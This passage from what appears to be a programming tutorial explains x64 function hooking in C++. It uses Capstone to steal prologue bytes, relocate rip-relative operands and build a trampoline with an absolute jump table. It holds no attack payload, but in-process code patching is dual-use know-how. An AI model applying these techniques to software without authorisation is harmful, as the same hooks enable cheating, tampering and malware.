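To make the byte layout concrete, here’s a rough sketch that assembles this easy-case trampoline into a std::vector rather than into executable memory. BuildEasyTrampoline() is a hypothetical function written for this illustration; it assumes the caller already knows that the first 5 bytes of the function are exactly one position-independent instruction, which is precisely the assumption that breaks in the harder cases.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical, simplified sketch: builds the bytes of an "easy case" trampoline.
// funcBytes must point to at least 5 bytes, and those 5 bytes must be one whole
// instruction with no relative operands (nothing here checks that).
std::vector<uint8_t> BuildEasyTrampoline(const uint8_t* funcBytes, uint64_t funcAddr)
{
    const size_t stolenSize = 5;
    std::vector<uint8_t> trampoline(funcBytes, funcBytes + stolenSize);

    // mov r10, imm64 ; jmp r10 (the same 13 byte sequence WriteAbsoluteJump64 emits)
    uint8_t absJump[13] = { 0x49, 0xBA, 0, 0, 0, 0, 0, 0, 0, 0, 0x41, 0xFF, 0xE2 };
    const uint64_t resumeAddr = funcAddr + stolenSize; // first byte after the stolen instruction
    for (int i = 0; i < 8; ++i)
        absJump[2 + i] = (uint8_t)(resumeAddr >> (8 * i)); // immediate is stored little-endian

    trampoline.insert(trampoline.end(), absJump, absJump + sizeof(absJump));
    return trampoline;
}
```

Feeding it the first bytes of EasyCase along with the address 0x00007FF7F2691FF0 produces the same 18 bytes as the Trampoline listing above.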

Functions that are harder to hook with a trampoline might have multiple instructions contained in their first 5 bytes, or use instructions with relative operands, like jumps or rip-relative addresses. The snippet below shows an example of a function that has some of these issues.

HardCase:
00007FF72B1F1390     85 C9          test        ecx,ecx  
00007FF72B1F1392     74 26          je          TargetFunc+2Ah (07FF72B1F13BAh)  
00007FF72B1F1394     83 F9 01       cmp         ecx,1  
00007FF72B1F1397     74 0C          je          TargetFunc+15h (07FF72B1F13A5h)
        [Rest of function omitted]

In order to build a trampoline for this function, we’re going to have to get our hands dirty. First of all, we’re going to need to steal the first 7 bytes of this function instead of the first 5, so that we can execute whole instructions in our trampoline. Second, we’re going to need to do something about the je at 00007FF72B1F1392h, since it won’t make sense to do a relative jump once we relocate the instruction.
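
The “7 instead of 5” rule is just rounding up to an instruction boundary. Here’s a small sketch of that rounding, assuming we already know the size of each leading instruction (hard-coded in the note below; in practice a disassembler would have to supply them). BytesToSteal() is a hypothetical name used only for this illustration.

```cpp
#include <cstdint>
#include <vector>

// Hypothetical helper, for illustration: given the sizes of a function's leading
// instructions, return how many bytes must be stolen so that at least minBytes
// are covered without splitting an instruction.
// Returns 0 if the supplied instructions don't add up to minBytes.
uint32_t BytesToSteal(const std::vector<uint8_t>& instructionSizes, uint32_t minBytes = 5)
{
    uint32_t total = 0;
    for (uint8_t size : instructionSizes)
    {
        total += size;
        if (total >= minBytes)
            return total;
    }
    return 0;
}
```

For HardCase the leading instruction sizes are 2, 2, 3 and 2, so BytesToSteal({2, 2, 3, 2}) gives 7. For EasyCase the first instruction is already 5 bytes long, so the answer is 5.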

The next section of this post is going to walk through how to write code that deals with these “hard” issues, but as a bit of a teaser, here’s what the trampoline for this will look like:

HardCase_Trampoline:
85 C9                              test   ecx,ecx  
74 10                              je     000001FA4B770021  ; rewritten jump
83 F9 01                           cmp    ecx,1  
49 BA 97 13 1F 2B F7 7F 00 00      mov    r10,   7FF72B1F1397h  ; Jump to hooked function body
41 FF E2                           jmp    r10  
49 BA BA 13 1F 2B F7 7F 00 00      mov    r10,   7FF72B1F13BAh  ; Absolute Instruction Table Starts Here
41 FF E2                           jmp    r10

This trampoline can be thought of as being made up of three sections (like a “jump sandwich”, which I thought was very funny when I wrote this at 5 am). It starts with the stolen bytes from the hooked function, with the relative instructions rewritten to jump to a later part of the trampoline. The meat of the sandwich is an absolute jump that goes back to the body of the hooked function (to an address after the jmp we installed for the hook). Finally, the bottom of the trampoline is a set of absolute jumps (or calls, if we had any) that go to the addresses that the relative jumps/calls in the stolen bytes originally targeted.
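
If it helps, the sandwich layout boils down to a couple of offsets from the start of the trampoline. The sketch below is my own simplification (the struct and function names are hypothetical) and only handles 2 byte short jumps like the je in HardCase.

```cpp
#include <cstdint>

// Hypothetical sketch of the "jump sandwich" layout.
// All offsets are measured from the start of the trampoline.
struct TrampolineLayout
{
    uint32_t jumpBackOffset; // where the absolute jump back to the hooked function starts
    uint32_t absTableOffset; // where the absolute instruction table starts
};

const uint32_t kAbsJumpSize = 13; // mov r10, imm64 (10 bytes) + jmp r10 (3 bytes)

TrampolineLayout ComputeLayout(uint32_t stolenByteCount)
{
    return { stolenByteCount, stolenByteCount + kAbsJumpSize };
}

// New rel8 operand for a 2 byte short jump that sits at instrOffset and should
// land on targetOffset (for example, its entry in the absolute instruction table).
int8_t ShortJumpOperand(uint32_t instrOffset, uint32_t targetOffset)
{
    // relative jumps are measured from the end of the jump instruction
    return (int8_t)((int32_t)targetOffset - (int32_t)(instrOffset + 2));
}
```

For HardCase, 7 stolen bytes put the jump back at offset 7 and the table at offset 20. The je sits at offset 2, so its new operand is 20 - 4 = 0x10, which matches the 74 10 in the listing above.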

Other sources refer to the absolute instruction table as a jump table, but I’m giving it a fancy name because it’s not going to contain jump instructions exclusively.

Example 3: Building a Trampoline For Code We Can Recompile

We just saw the rough skeleton of the trampoline we’re going to build, now it’s time to write the code to build it. Roughly speaking, our plan of attack looks like this:

“Steal” the first 5+ bytes (rounded up to the nearest whole instruction) of the function we want to hook.
Fix up any rip-relative addressing (like lea rcx,[rip+0xbeef]).
For each relative jump or call instruction, calculate the address that it originally intended to reference, and add an absolute jmp/call to that address in the Absolute Instruction Table.
Rewrite the relative instructions in the stolen bytes to jump to their corresponding entry in the Absolute Instruction Table.
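Immediately after the stolen instruction bytes, write a jump back to the first instruction of the hooked function that wasn’t stolen (its 6th byte in the easy case, later if we had to steal more than 5 bytes), so that the hooked function continues executing once the trampoline ends.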

These steps won’t be completed sequentially in our final program, but I’ve split them out into discrete steps to make explaining things easier.

For a bit of context, here’s what our final InstallHook() function is going to look like when we’re done. We’re going to be constructing a BuildTrampoline() function which will be given a pointer to some memory to write a trampoline into, and not much else. BuildTrampoline() is going to be called from a modified version of the InstallHook() function we had in our earlier example. Notice that BuildTrampoline() will also return the size, in bytes, of the trampoline that it creates.

void InstallHook(void* func2hook, void* payloadFunc, void** trampolinePtr)
{
  DWORD oldProtect;
  VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

  void* hookMemory = AllocatePageNearAddress(func2hook);
  uint32_t trampolineSize = BuildTrampoline(func2hook, hookMemory);
  *trampolinePtr = hookMemory;

  //create the relay function
  void* relayFuncMemory = (char*)hookMemory + trampolineSize;
  WriteAbsoluteJump64(relayFuncMemory, payloadFunc); //write relay func instructions

  //install the hook
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
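  //do the subtraction at full pointer width, then narrow the result to the 32 bit operand
  const int32_t relAddr = (int32_t)((int64_t)relayFuncMemory - ((int64_t)func2hook + (int64_t)sizeof(jmpInstruction)));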
  memcpy(jmpInstruction + 1, &relAddr, 4);
  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

The intended use case for the trampoline pointer is to allow payload functions to call trampolines like regular functions, as shown in the snippet below.

void(*TargetFuncTrampoline)(int, float) = nullptr;
void HookPayload(int x, float y)
{
  printf("Hook executed\n");
  TargetFuncTrampoline(x+1, y);
}

Notice that we’re going to build the trampoline in the same “near” memory that the relay function is currently being constructed in. That’s going to make dealing with the rip-relative addressing a lot easier when we get to it.

Step 1: Stealing Instruction Bytes

In order for our trampoline to work at all, it needs to execute the instructions that are overwritten when we install our hook. To do this, we need to “steal” these instruction bytes from our target function before overwriting them. The verb “steal” is important here - we’re not only going to copy these instruction bytes, we’re also going to replace them with 1 byte NOPs in the target function. That way we won’t wind up with any partial instructions when we install the hook jump.

To make sure we steal whole instructions, we need to use a disassembly library. The rest of this article is going to use the Capstone library for all disassembly tasks. Any disassembler will do, but Capstone has some features that are going to make our life easier later on.

This snippet shows how to steal the instructions contained within the first 5 bytes of a target function using Capstone. The StealBytes() function returns a struct with some additional data about the stolen instructions which we’ll use later.

struct X64Instructions
{
  cs_insn* instructions;
  uint32_t numInstructions;
  uint32_t numBytes;
};

X64Instructions StealBytes(void* function)
{
  // Disassemble stolen bytes
  csh handle;
  cs_open(CS_ARCH_X86, CS_MODE_64, &handle);
  cs_option(handle, CS_OPT_DETAIL, CS_OPT_ON); // we need details enabled for relocating RIP relative instrs

  size_t count;
  cs_insn* disassembledInstructions; //allocated by cs_disasm, needs to be manually freed later
  count = cs_disasm(handle, (uint8_t*)function, 20, (uint64_t)function, 20, &disassembledInstructions);

  //get the instructions covered by the first 5 bytes of the original function
  uint32_t byteCount = 0;
  uint32_t stolenInstrCount = 0;
  for (int32_t i = 0; i < count; ++i)
  {
    cs_insn& inst = disassembledInstructions[i];
    byteCount += inst.size;
    stolenInstrCount++;
    if (byteCount >= 5) break;
  }

  //replace instructions in target func with NOPs
  memset(function, 0x90, byteCount);

  cs_close(&handle);
  return { disassembledInstructions, stolenInstrCount, byteCount };
}

We’ll call this function right at the start of BuildTrampoline(), so it’s about time we started writing that function too. I’ve found the most intuitive way to structure BuildTrampoline() is to create 3 pointers at the start, each pointing to the next available location in each of the three sections of our trampoline memory. Whenever we write to a location pointed to by one of these pointers, we’ll then increment the pointer by that many bytes, so each of them is always pointing to an available memory address.

uint32_t BuildTrampoline(void* func2hook, void* dstMemForTrampoline)
{
  X64Instructions stolenInstrs = StealBytes(func2hook);

  uint8_t* stolenByteMem = (uint8_t*)dstMemForTrampoline;
  uint8_t* jumpBackMem = stolenByteMem + stolenInstrs.numBytes;
  uint8_t* absTableMem = jumpBackMem + 13; //13 is the size of the 64 bit mov/jmp instruction pair at jumpBackMem
  
  for (uint32_t i = 0; i < stolenInstrs.numInstructions; ++i)
  {
    cs_insn& inst = stolenInstrs.instructions[i];

    //perform any fixup logic to the stolen instructions here

    memcpy(stolenByteMem, inst.bytes, inst.size);
    stolenByteMem += inst.size;
  }
  
  //write jump back to hooked func

  free(stolenInstrs.instructions);
  return uint32_t(absTableMem - (uint8_t*)dstMemForTrampoline); //both operands must be uint8_t* for the subtraction to compile
}

If we only ever needed to hook “easy” functions (as defined earlier), we could skip down to the last step in our trampoline creation procedure now. There’s a lot more legwork required to support less-than-easy functions though.

Step 2: Fixing up RIP-Relative Addressing

One case where our naive trampoline building function will fail is if any of the stolen instructions contain rip-relative addressing. In x64, there are a lot of instructions that do this, but the easiest example is a function that calls printf.

void PrintHaha()
{
  printf("Haha\n");
}

On my machine, the generated assembly uses an lea instruction to load the string location before the call to printf. The disassembly text generated by Visual Studio makes it look like the lea instruction is grabbing an absolute address, but the instruction bytes reveal that we’re actually computing the address of the “Haha\n” string by adding an offset to the current value of the instruction pointer.

PrintHaha:
00007FFCB54211E0 48 8D 0D F9 1F 00 00   lea         rcx,[string "Haha\n" (07FFCB54231E0h)]  
00007FFCB54211E7 E9 24 FE FF FF         jmp         printf (07FFCB5421010h)
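
You can check this by hand from the instruction bytes in the listing. The last four bytes of the lea (F9 1F 00 00) are the little-endian offset 0x1FF9, and rip points at the next instruction while the lea executes. The helper below is a hypothetical one, written only to spell out that sum.

```cpp
#include <cstdint>

// Hypothetical helper, for illustration: the address a rip-relative operand refers to.
// rip holds the address of the NEXT instruction while the current one executes,
// which is why the instruction's own size is part of the sum.
uint64_t RipRelativeTarget(uint64_t instrAddr, uint8_t instrSize, int32_t disp32)
{
    return instrAddr + instrSize + (int64_t)disp32;
}
```

Plugging in the lea from PrintHaha, RipRelativeTarget(0x00007FFCB54211E0, 7, 0x1FF9) comes out to 0x00007FFCB54231E0, which is the string address shown in the disassembly text.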

If we steal the lea instruction verbatim, we’ll get garbage data when we execute the stolen instruction because our instruction pointer will be at a different address. In order to actually use instructions that have rip-relative addressing in our trampoline, we need to fix up the offsets they use to be relative to our trampoline memory.

The first step of this is to detect when an instruction contains a rip-relative operand. Capstone makes this easy.

bool IsRIPRelativeInstr(cs_insn& inst)
{
  cs_x86* x86 = &(inst.detail->x86);

  for (uint32_t i = 0; i < inst.detail->x86.op_count; i++)
  {
    cs_x86_op* op = &(x86->operands[i]);
    
    //mem type is rip relative, like lea rcx,[rip+0xbeef]
    if (op->type == X86_OP_MEM)
    {
      //if we're relative to rip
      return op->mem.base == X86_REG_RIP;
    }
  }

  return false;
}

Relocating an instruction that’s been identified as having a rip-relative operand is a bit more of a bear. Remember how I mentioned that we’re going to put our trampoline in memory that’s within a 32 bit jump of our target function? That’s to try to avoid cases where the new offset we compute is too large to be stored in the existing instruction’s operand.

template<class T>
T GetDisplacement(cs_insn* inst, uint8_t offset)
{
  T disp;
  memcpy(&disp, &inst->bytes[offset], sizeof(T));
  return disp;
}

//rewrite instruction bytes so that any RIP-relative displacement operands
//make sense with wherever we're relocating to
void RelocateInstruction(cs_insn* inst, void* dstLocation)
{
  cs_x86* x86 = &(inst->detail->x86);
  uint8_t offset = x86->encoding.disp_offset;

  uint64_t displacement = inst->bytes[x86->encoding.disp_offset];
  switch (x86->encoding.disp_size)
  {
    case 1: 
    {
      int8_t disp = GetDisplacement<uint8_t>(inst, offset);
      disp -= uint64_t(dstLocation) - inst->address;
      memcpy(&inst->bytes[offset], &disp, 1);
    }break;

    case 2: 
    {
      int16_t disp = GetDisplacement<uint16_t>(inst, offset);
      disp -= uint64_t(dstLocation) - inst->address;
      memcpy(&inst->bytes[offset], &disp, 2);
    }break;

    case 4:
    {
      int32_t disp = GetDisplacement<int32_t>(inst, offset);
      disp -= uint64_t(dstLocation) - inst->address;
      memcpy(&inst->bytes[offset], &disp, 4);
    }break;
  }
}

Shout out to the polyhook source that I stole this logic from.

Plugging these functions into the BuildTrampoline() logic requires adding a check and a function call to the for loop that processes our stolen instructions.

for (uint32_t i = 0; i < stolenInstrs.numInstructions; ++i)
{
  cs_insn& inst = stolenInstrs.instructions[i];

  //perform any fixup logic to the stolen instructions here
  if (IsRIPRelativeInstr(inst))
  {
    RelocateInstruction(&inst, stolenByteMem);
  }
  memcpy(stolenByteMem, inst.bytes, inst.size);
  stolenByteMem += inst.size;
}

Now we can hook our little printf function with wild abandon!

Step 3: Building the Absolute Instruction Table

Next we need to deal with any relative jump or call instructions in our stolen bytes. After all “jump 10 bytes from here” doesn’t mean very much when the instruction has been moved to a new “here.” I have no idea how to handle loop instructions, so the example code will only deal with jmp and call instructions.

Like with the rip-relative operands, the first thing we need to do is identify whether an instruction is one of the flavors of jmp or call that we care about. Identifying relative calls is pretty easy, because there aren’t that many varieties of call instructions, and all the relative versions have opcodes that start with 0xE8.

bool IsRelativeCall(cs_insn& inst)
{
  bool isCall = inst.id == X86_INS_CALL;
  bool startsWithE8 = inst.bytes[0] == 0xE8;
  return isCall && startsWithE8;
}

Identifying jmps is a little harder because there are lots of different types of jmp instructions. Since conditional jumps only come in relative versions, if an instruction’s id says it’s a conditional jump, we know it uses relative addressing. The unconditional “jmp” instruction can use relative addressing, but it can also do things like jump to an address in a register. Thankfully, the behaviour of a jmp is dictated by its opcode bytes. Relative jmps start with either 0xEB or 0xE9.

bool IsRelativeJump(cs_insn& inst)
{
  bool isAnyJumpInstruction = inst.id >= X86_INS_JAE && inst.id <= X86_INS_JS;
  bool isJmp = inst.id == X86_INS_JMP;
  bool startsWithEBorE9 = inst.bytes[0] == 0xEB || inst.bytes[0] == 0xE9;
  return isJmp ? startsWithEBorE9 : isAnyJumpInstruction;
}
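
If you’re curious what a check like this looks like at the byte level, the sketch below does roughly the same job without Capstone. This is an illustration only: LooksLikeRelativeJump is a hypothetical name, and it assumes the instruction has no prefix bytes in front of its opcode, which isn’t something real code can rely on.

```cpp
#include <stdint.h>

//Hypothetical, Capstone-free version of the check above. Only looks at opcode
//bytes, and assumes `bytes` points at the opcode itself (no prefixes)
bool LooksLikeRelativeJump(const uint8_t* bytes)
{
    uint8_t op = bytes[0];

    if (op == 0xEB || op == 0xE9) return true; //jmp with a 1 or 4 byte relative operand
    if (op >= 0x70 && op <= 0x7F) return true; //conditional jumps with a 1 byte operand
    if (op == 0xE3) return true;               //jrcxz, also a 1 byte operand

    //conditional jumps with a 4 byte operand use a two byte opcode: 0x0F 0x80-0x8F
    if (op == 0x0F) return bytes[1] >= 0x80 && bytes[1] <= 0x8F;

    return false; //everything else, including jmps through a register or memory
}
```

With this, the bytes 75 10 (a short jne) and 0F 84 followed by a 4 byte operand (a near je) are both reported as relative jumps, while FF E0 (jmp rax) is not.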

We can use these two functions to quickly identify any stolen instructions that are going to require extra attention:

for (int i = 0; i < stolenInstrs.numInstructions; ++i)
{
  cs_insn& inst = stolenInstrs.instructions[i];
  if (inst.id >= X86_INS_LOOP && inst.id <= X86_INS_LOOPNE)
  {
    return 0; //bail out on loop instructions, I don't have a good way of handling them 
  }
  
  if (IsRIPRelativeInstr(inst))
  {
    RelocateInstruction(&inst, stolenByteMem);
  }
  else if (IsRelativeJump(inst))
  {
  }
  else if (IsRelativeCall(inst))
  {
  }
  memcpy(stolenByteMem, inst.bytes, inst.size);
  stolenByteMem += inst.size;
}

Next we need to figure out the address that the original instruction wanted to go to, and add an absolute jump (or call) to that address to our Absolute Instruction Table. The Capstone library handles calculating the target address of relative instructions for us automatically, which is handy.
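
For reference, the target of a relative jump or call is the address of the next instruction plus the signed operand. The sketch below does that calculation by hand. RelativeBranchTarget is a made-up helper: it assumes the operand is the last thing in the instruction, only handles 1 and 4 byte operands, and relies on the host being little-endian (which x64 is).

```cpp
#include <assert.h>
#include <stdint.h>
#include <string.h>

//Hypothetical helper: computes where a relative jmp/call located at instrAddr goes.
//opcodeSize is the number of bytes in front of the operand
uint64_t RelativeBranchTarget(uint64_t instrAddr, const uint8_t* bytes, uint8_t instrSize, uint8_t opcodeSize)
{
    uint8_t operandSize = instrSize - opcodeSize;
    assert(operandSize == 1 || operandSize == 4);

    int64_t rel = 0;
    if (operandSize == 1)
    {
        int8_t rel8;
        memcpy(&rel8, bytes + opcodeSize, sizeof(rel8));
        rel = rel8; //sign extends
    }
    else
    {
        int32_t rel32;
        memcpy(&rel32, bytes + opcodeSize, sizeof(rel32));
        rel = rel32; //sign extends
    }

    //relative branches are measured from the end of the instruction
    return instrAddr + instrSize + uint64_t(rel);
}
```

As a sanity check, the bytes E8 FB 0F 00 00 at address 0x1000 are a call to 0x2000 (0x1000 + 5 + 0xFFB), and EB FE at any address is a jump back to itself.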

Jumps are easier to handle than calls, so we’ll start there. We’ll reuse the WriteAbsoluteJump64 function from earlier in this post to make the code a bit more concise.

uint32_t AddJmpToAbsTable(cs_insn& jmp, uint8_t* absTableMem)
{
  char* targetAddrStr = jmp.op_str; //where the instruction intended to go
  uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);
  WriteAbsoluteJump64(absTableMem, (void*)targetAddr);
  return 13; //size of mov/jmp instrs for absolute jump
}

Note that this function doesn’t rewrite the existing jump instruction, it only adds an absolute version of it to the absolute instruction table (AIT). We’ll handle pointing the original jump to this AIT entry later in this post.
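
One thing to be aware of is that _strtoui64 is specific to Microsoft’s C runtime. As a rough sketch of the same parsing step in portable C++, the (hypothetical) TryParseBranchTarget below uses strtoull, and also reports when the operand string isn’t a plain number, which is what you’d get for something like a jump through a register. It assumes the operand text of a relative branch is a single hex literal such as 0x7ff612341000.

```cpp
#include <stdint.h>
#include <stdlib.h>

//Hypothetical helper: parses an operand string like "0x7ff612341000" into an address.
//Returns false if the string isn't a single numeric literal
bool TryParseBranchTarget(const char* opStr, uint64_t* outTarget)
{
    char* end = nullptr;
    unsigned long long value = strtoull(opStr, &end, 0); //base 0 accepts the 0x prefix

    if (end == opStr || *end != '\0')
    {
        return false; //no digits consumed, or trailing text after the number
    }

    *outTarget = value;
    return true;
}
```

Bailing out when the parse fails is a design choice for this sketch. The functions in this post skip that check because they’re only ever called on instructions that have already been identified as relative.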

Dealing with calls is a bit different. If we just add an absolute call instruction to our AIT, when that call returns, we’ll wind up at the next jump in the table. That would be bad, so instead we also need to add a jump instruction after our absolute calls to redirect program flow to somewhere more helpful. In this case, we’ll jump to the middle of our trampoline, which is the jump back to the hooked function’s body.

uint32_t AddCallToAbsTable(cs_insn& call, uint8_t* absTableMem, uint8_t* jumpBackToHookedFunc)
{
  char* targetAddrStr = call.op_str; //where the instruction intended to go
  uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);

  uint8_t* dstMem = absTableMem;

  uint8_t callAsmBytes[] =
  {
    0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //movabs 64 bit value into r10
    0x41, 0xFF, 0xD2, //call r10
  };
  memcpy(&callAsmBytes[2], &targetAddr, sizeof(void*));
  memcpy(dstMem, &callAsmBytes, sizeof(callAsmBytes));
  dstMem += sizeof(callAsmBytes);

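  //after the call, we need to add a second 2 byte jump, which will jump back to the 
  //final jump of the stolen bytes. Its offset is relative to the end of the jmp itself,
  //which lives at dstMem (right after the call), not at the start of the table entry
  uint8_t jmpBytes[2] = { 0xEB, uint8_t(jumpBackToHookedFunc - (dstMem + sizeof(jmpBytes))) };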
  memcpy(dstMem, jmpBytes, sizeof(jmpBytes));

  return sizeof(callAsmBytes) + sizeof(jmpBytes); //15
}
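
Since the byte math for the trailing jump is easy to get wrong, here’s a small sketch that builds one call entry into an ordinary buffer so the result can be inspected. WriteCallEntry is a hypothetical stand-in for AddCallToAbsTable() that takes the target address directly instead of a Capstone instruction. The thing to notice is that a short jmp’s operand is measured from the end of the jmp, which sits 13 bytes into the entry.

```cpp
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

//Hypothetical stand-in for AddCallToAbsTable(): writes one call entry at `entry` and
//returns its size. jumpBack is where the trampoline's jump back to the hooked function starts
uint32_t WriteCallEntry(uint8_t* entry, uint64_t callTarget, const uint8_t* jumpBack)
{
    uint8_t callBytes[13] =
    {
        0x49, 0xBA, 0, 0, 0, 0, 0, 0, 0, 0, //movabs 64 bit value into r10
        0x41, 0xFF, 0xD2,                   //call r10
    };
    memcpy(&callBytes[2], &callTarget, sizeof(callTarget));
    memcpy(entry, callBytes, sizeof(callBytes));

    //the 2 byte jmp goes right after the call
    uint8_t* jmpInstr = entry + sizeof(callBytes);

    //a short jmp's operand is relative to the end of the jmp instruction
    ptrdiff_t rel = jumpBack - (jmpInstr + 2);
    assert(rel >= -128 && rel <= 127);

    uint8_t jmpBytes[2] = { 0xEB, uint8_t(int8_t(rel)) };
    memcpy(jmpInstr, jmpBytes, sizeof(jmpBytes));

    return uint32_t(sizeof(callBytes) + sizeof(jmpBytes)); //15
}
```

With 5 stolen bytes, the jump back starts at offset 5 and the first table entry at offset 18, so the trailing jmp ends at offset 33 and needs an operand of -28 (0xE4) to get back to offset 5.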

You’ve probably noticed that both of these functions return the number of bytes that they wrote to the AIT. This is so we can increment the absTableMem pointer in BuildTrampoline(). These calls should be added inside the IsRelativeJump()/IsRelativeCall() conditionals in the BuildTrampoline() function.

for (int i = 0; i < stolenInstrs.numInstructions; ++i)
{
  cs_insn& inst = stolenInstrs.instructions[i];
  if (inst.id >= X86_INS_LOOP && inst.id <= X86_INS_LOOPNE)
  {
    return 0; //bail out on loop instructions, I don't have a good way of handling them 
  }
  
  if (IsRIPRelativeInstr(inst))
  {
    RelocateInstruction(&inst, stolenByteMem);
  }
  else if (IsRelativeJump(inst))
  {
      uint32_t aitSize = AddJmpToAbsTable(inst, absTableMem);
      //rewrite inst here
      absTableMem += aitSize;
  }
  else if (IsRelativeCall(inst))
  {
      uint32_t aitSize = AddCallToAbsTable(inst, absTableMem, jumpBackMem);
      //rewrite inst here
      absTableMem += aitSize;
  }
  memcpy(stolenByteMem, inst.bytes, inst.size);
  stolenByteMem += inst.size;
}

Step 4: Rewriting Jumps/Calls to Use the AIT.

Adding instructions to the Absolute Instruction Table is great and all, but in order for any of that work to matter, we also need to rewrite our stolen relative instructions to actually go to the AIT. Similar to the last step, this needs to be handled differently for jumps vs calls.

Calls are the easier of the two to rewrite, so we’ll start with them. Since all call instructions are unconditional, we can replace any relative calls with jumps to the appropriate address inside the AIT. A 2 byte jmp instruction has a signed 1 byte operand, so it can only reach 127 bytes forward, but our trampoline is small enough that every AIT entry sits within that range. We don’t want to change the size of the call instruction we’re rewriting, so we’ll first replace all the bytes for that instruction with NOPs. That way, if we rewrite a 5 byte call with a 2 byte jmp, we haven’t added garbage instructions to the trampoline.

void RewriteCallInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
  //calls need to be rewritten as relative jumps to the abs table
  //but we want to preserve the length of the instruction, so pad with NOPs
  //the jmp sits at the start of the padded instruction, so its offset is measured
  //from the end of the 2 byte jmp, not from the end of the original call
  uint8_t jmpBytes[2] = { 0xEB, 0x0 };
  jmpBytes[1] = uint8_t(absTableEntry - (instrPtr + sizeof(jmpBytes)));
  memset(instr->bytes, 0x90, instr->size);
  memcpy(instr->bytes, jmpBytes, sizeof(jmpBytes));
}
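
Here’s the same idea as a sketch that works on a plain byte array, which makes it easier to see what the rewritten instruction looks like. OverwriteWithShortJmp is a hypothetical helper, not part of the hooking code. It assumes the jmp is written at the start of the padded instruction, so the operand is measured from 2 bytes past the instruction’s address, and it asserts that the distance fits in a signed byte.

```cpp
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

//Hypothetical buffer-based take on RewriteCallInstruction(). instrBytes is a copy of the
//instruction, instrAddr is where that copy will live in the trampoline, dest is the AIT entry
void OverwriteWithShortJmp(uint8_t* instrBytes, uint8_t instrSize, const uint8_t* instrAddr, const uint8_t* dest)
{
    assert(instrSize >= 2); //need room for the jmp itself

    ptrdiff_t rel = dest - (instrAddr + 2); //measured from the end of the 2 byte jmp
    assert(rel >= -128 && rel <= 127);      //the operand is a signed byte

    memset(instrBytes, 0x90, instrSize);    //pad with NOPs to keep the original length
    instrBytes[0] = 0xEB;
    instrBytes[1] = uint8_t(int8_t(rel));
}
```

A 5 byte call at the very start of the trampoline, with its AIT entry at offset 18, comes out as EB 10 90 90 90.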

Jumps are more of a pain. There are a lot of different jump instructions that we might encounter, many of which are some flavor of a conditional jump. We can’t replace these instructions with a normal jmp because that could change the execution logic of our stolen bytes. Instead we need to rewrite the operands directly, so that these jumps will conditionally jump to the Absolute Instruction Table.

void RewriteJumpInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
  uint8_t distToJumpTable = absTableEntry - (instrPtr + instr->size); 

  //jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand
  //rewrite the operand for the jump to go to the jump table
  uint8_t instrByteSize = instr->bytes[0] == 0x0F ? 2 : 1;
  uint8_t operandSize = instr->size - instrByteSize;

  switch (operandSize)
  {
  case 1: {instr->bytes[instrByteSize] = distToJumpTable; }break;
  case 2: {uint16_t dist16 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist16, 2); } break;
  case 4: {uint32_t dist32 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist32, 4); } break;
  }
}
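
To see what this does to actual bytes, the sketch below applies the same operand rewrite to instructions stored in plain arrays. RetargetRelativeJump is a hypothetical name, and the example assumes a little-endian host and skips the 2 byte operand case for brevity. Because the instruction keeps its size here, the operand is measured from the end of the whole instruction.

```cpp
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

//Hypothetical buffer-based take on RewriteJumpInstruction(). Only the operand changes,
//so the opcode (and therefore the jump's condition) is left alone
void RetargetRelativeJump(uint8_t* instrBytes, uint8_t instrSize, const uint8_t* instrAddr, const uint8_t* dest)
{
    //two byte opcodes start with 0x0F
    uint8_t opcodeSize = (instrBytes[0] == 0x0F) ? 2 : 1;
    uint8_t operandSize = instrSize - opcodeSize;

    //the instruction keeps its size, so the operand is relative to the end of it
    ptrdiff_t rel = dest - (instrAddr + instrSize);

    if (operandSize == 1)
    {
        assert(rel >= -128 && rel <= 127);
        int8_t rel8 = int8_t(rel);
        memcpy(&instrBytes[opcodeSize], &rel8, sizeof(rel8));
    }
    else if (operandSize == 4)
    {
        int32_t rel32 = int32_t(rel);
        memcpy(&instrBytes[opcodeSize], &rel32, sizeof(rel32));
    }
}
```

A short je (74 xx) that lives at offset 3 of the trampoline and needs to reach an AIT entry at offset 20 becomes 74 0F, and a near jne (0F 85 followed by 4 operand bytes) at offset 0 that needs to reach offset 19 becomes 0F 85 0D 00 00 00.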

The snippet below shows how these new functions should be added to BuildTrampoline(). Notice that we need to wait until after calling these new rewrite functions before we can increment the absTableMem pointer.

uint32_t BuildTrampoline(void* func2hook, void* dstMemForTrampoline)
{
  X64Instructions stolenInstrs = StealBytes(func2hook);

  uint8_t* stolenByteMem = (uint8_t*)dstMemForTrampoline;
  uint8_t* jumpBackMem = stolenByteMem + stolenInstrs.numBytes;
  uint8_t* absTableMem = jumpBackMem + 13; //13 is the size of a 64 bit mov/jmp instruction pair

  for (int i = 0; i < stolenInstrs.numInstructions; ++i) {

    cs_insn& inst = stolenInstrs.instructions[i];
    if (inst.id >= X86_INS_LOOP && inst.id <= X86_INS_LOOPNE){
      return 0; //bail out on loop instructions, I don't have a good way of handling them 
    }

    if (IsRIPRelativeInstr(inst)){
      RelocateInstruction(&inst, stolenByteMem);
    }
    else if (IsRelativeJump(inst)){
      uint32_t aitSize = AddJmpToAbsTable(inst, absTableMem);
      RewriteJumpInstruction(&inst, stolenByteMem, absTableMem);
      absTableMem += aitSize; 
    }
    else if (IsRelativeCall(inst)){
      uint32_t aitSize = AddCallToAbsTable(inst, absTableMem, jumpBackMem);
      RewriteCallInstruction(&inst, stolenByteMem, absTableMem);
      absTableMem += aitSize;
    }

    //write stolen instruction (rewritten or otherwise) to trampoline mem
    memcpy(stolenByteMem, inst.bytes, inst.size);
    stolenByteMem += inst.size;
  }

   //write jump back to hooked func

